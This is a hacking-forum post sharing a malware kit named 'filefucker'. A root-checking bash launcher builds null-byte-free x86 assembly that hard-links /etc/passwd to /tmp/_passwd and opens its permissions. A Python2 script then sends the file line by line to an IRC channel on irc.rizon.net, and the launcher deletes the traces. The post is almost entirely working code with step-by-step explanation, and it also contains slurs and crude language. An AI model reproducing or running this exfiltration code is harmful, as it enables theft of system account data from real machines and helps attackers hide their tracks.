Sinisterly

Full Version: "filefucker" (mix of intel x86 assembly, python2, and bash)
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
execute.sh

Spoiler:
Code:
#!/bin/bash

if [ $(id -u ) != 0 ]; then
    echo "/x/ not root, exiting"
    exit
fi

nasm -f elf filefucker.asm
ld -m elf_i386 filefucker.o -o filefucker
SHELLCODE=$(objdump -d filefucker)
printf "$SHELLCODE\n\n\n"
if [[ $SHELLCODE == *" 00 "* ]]; then
    printf "\033[31m! warning !\033[0m there are nullbytes in the shellcode\n\n"
else
    printf "\033[32m* note *\033[0m there are no nullbytes in the shellcode\n\n"
fi
echo "executing filefucker"
./filefucker
echo "filefucker executed, cleaning up"
rm -r f filefucker.o filefucker
./irc_send.py
rm -r f /tmp/_passwd

filefucker.asm

Spoiler:
Code:
SECTION .data
    oldfile db "/etc/passwd",0
    oldfilestr db "/etc/passwd",0x0a
    oldfilestrlen equ $-oldfilestr

    newfile db "/tmp/_passwd",0

SECTION .text
    global _start

_start:
    ; we gotta set the value of all of our required registers to 0 by xor'ing them
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx

    ; we have to inc eax 9 times as to not bring up nullbytes

    inc eax
    inc eax
    inc eax

    inc eax
    inc eax
    inc eax

    inc eax
    inc eax
    inc eax

    ; eax is incremented 9 times, value of eax is now 9

    mov ebx, oldfile
    mov ecx, newfile
    int 0x80

    ; since eax is still 9 we don't need to xor it, we can just increment it or decrement it if we need to
    ; we do however have to xor the ebx and ecx registers since we used them in the previous instructions

    xor ebx, ebx
    xor ecx, ecx

    ; but since we are going to call write() in the next bit, it's more efficient just to xor eax and then increment instead of
    ; decrementing a bunch of times

    xor eax, eax

    ; now we're going to write the files that we targetted
    ; we need to use write() for this, and it's syscall 4 so we need to increment eax 4 times

    inc eax
    inc eax

    inc eax
    inc eax

    ; eax has been incremented 4 times, now we have to assign what file descriptor we want to write to
    ; in this case, we want to write to stdout, and that is assigned on 1, so we have to increment ebx only once

    inc ebx

    ; ebx has been incremented to one and is now assigned to stdout
    ; now we have to supply arguments to ecx to print our data

    mov ecx, oldfilestr

    ; finally, edx requires the length of this data

    ; we could use "mov edx, oldfilestrlen" but that would cause nullbytes to be present in the binary, we don't want that

    inc edx
    inc edx
    inc edx
    inc edx

    inc edx
    inc edx
    inc edx
    inc edx

    inc edx
    inc edx
    inc edx
    inc edx

    ; this source will now print the data correctly

    int 0x80

    ; now we need to chmod the newfile so that the python script can upload it online

    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    xor edx, edx

    ; sys_chmod is syscall 15, so we need to increment eax 15 times

    inc eax
    inc eax
    inc eax
    inc eax
    inc eax

    inc eax
    inc eax
    inc eax
    inc eax
    inc eax

    inc eax
    inc eax
    inc eax
    inc eax
    inc eax

    ; eax has been incremented 15 times, value of eax is now 15

    mov ebx, newfile
    mov cx, 0755o       ; here we're using a 16 bit register since we just have to supply an integer, and this also solves the issue of nullbytes
                        ; since supplying "0755" to a 32 bit register would supply 0x00000755, we don't want that

    int 0x80

    ; alright so all we have to do now is call exit()

    xor eax, eax
    inc eax

    int 0x80

irc_send.py

Spoiler:
Code:
#!/usr/bin/python2

import socket
import string
import random
import time

def main():
    username = ''.join(random.choice(string.ascii_uppercase+string.ascii_lowercase) for _ in range(8))
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("irc.rizon.net", 6667))
    sock.send("USER {0} {0} {0} :ilovedicklol\n".format(username))
    sock.send("NICK {0}\n".format(username))
    sock.send("JOIN #neksec\n")
    _passwd = open("/tmp/_passwd", "r")
    for x in _passwd.read().split("\n"):
        sock.send("PRIVMSG #neksec :{0}\n".format(x))
        time.sleep(1)
    sock.send("DISCONNECT")

if __name__ == "__main__":
    main()

tarball download


so, I haven't touched assembly in fucking ages, so I thought I'd make a little something
so execute.sh compiles the intel x86 assembly source
the assembly source links /etc/passwd to /tmp/_passwd, then chmods /etc/_passwd and gives it global read/write permissions
then exits, then the bash script checks for any nullbytes in the objdump -d output, just in case I feel like deploying the main binary as shellcode
then it executes filefucker, removes the compiled object file, and the executable binary itself
then my python script is executed, which connects to an irc channel, splits /tmp/_passwd line by line, and sends it into an irc channel
then once it's all sent, it removes the duplicate file
I made something like this before, but this is more or less a fleshed out version cause I haven't touched assembly in ages
this is faggot signing out
I'm gay

I should also add that execute.sh is the main script.
literally just run that file and everything else will execute along with it.
I hope this helps some of you learn some stuff lol.
absoloute shit malware. I've never seen anything so skiddy in my life, is this a joke?